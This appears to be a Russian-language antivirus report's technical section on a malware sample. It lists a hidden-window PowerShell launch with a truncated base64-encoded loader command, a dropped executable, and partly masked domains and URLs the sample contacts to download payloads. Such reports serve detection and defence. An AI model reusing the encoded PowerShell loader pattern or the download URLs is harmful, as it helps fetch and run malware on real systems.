Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4ARQB3AC0ATwBCAEoARQBDAHQAIABzAHkAUwBUAGUATQAuAEkAbwAuAGMAbwBtAFAAUgBlAFMAcwBJAE8AbgAuAGQARQBmAEwAYQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsASQBvAC4AbQBFAE0ATwBSAHkAcwB0AFIARQBhAG0AXQAgAFsAYwBvAE...
- %HOMEPATH%\208.exe
- %HOMEPATH%\208.exe
- 'em###nerji.com':80
- 'em###nerji.com':443
- 'ha####iltapps.com':443
- 'pk#.goog':80
- 'ry###rest.com':80
- http://em###nerji.com/wp-content/RRKu/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.ry###rest.com/cgi-bin/jmEoN/
- http://www.ry###rest.com/cgi-sys/suspendedpage.cgi
- 'em###nerji.com':443
- 'ha####iltapps.com':443
- DNS ASK em###nerji.com
- DNS ASK ha###gems.com
- DNS ASK ha####iltapps.com
- DNS ASK pk#.goog
- DNS ASK ry###rest.com
- DNS ASK se###five.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4ARQB3AC0ATwBCAEoARQBDAHQAIABzAHkAUwBUAGUATQAuAEkAbwAuAGMAbwBtAFAAUgBlAFMAcwBJAE8AbgAuAGQARQBmAEwAYQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsASQBvAC4AbQBFAE0ATwBSAHkAcwB0AFIARQBhAG0AXQAgAFsAYwBvAE...' (со скрытым окном)